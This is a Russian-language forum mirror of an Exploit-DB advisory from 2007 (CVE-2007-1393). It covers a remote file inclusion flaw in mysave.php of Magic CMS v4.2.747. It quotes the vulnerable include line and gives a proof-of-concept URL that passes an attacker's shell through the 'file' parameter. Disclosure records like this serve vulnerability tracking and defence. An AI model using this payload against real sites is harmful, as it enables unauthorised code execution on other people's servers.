- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3438
- Проверка EDB
-
- Пройдено
- Автор
- DNX
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-1393
- Дата публикации
- 2007-03-08
Код:
\#'#/
(-.-)
---------------------oOO---(_)---OOo---------------------
| Magic CMS v4.2.747 (mysave.php) Remote File Inclusion |
| (works only with register_globals = on) |
| coded by DNX |
---------------------------------------------------------
[!] Discovered: DNX
[!] Vendor: www.geo-soft.net/de-ch/
[!] Detected: 03.03.2007
[!] Reported: 03.03.2007
[!] Remote: yes
[!] Background: Magic CMS is an easy to use content
management system based on PHP.
[!] Bug: $file in mysave.php line 3
@include($file."/myconfig.php");
[!] PoC: http://[site]/[path]/mysave.php?file=[shell]
[!] Solution: Waiting for patch/update. No response from
vendor.
# milw0rm.com [2007-03-08]- Источник
- www.exploit-db.com
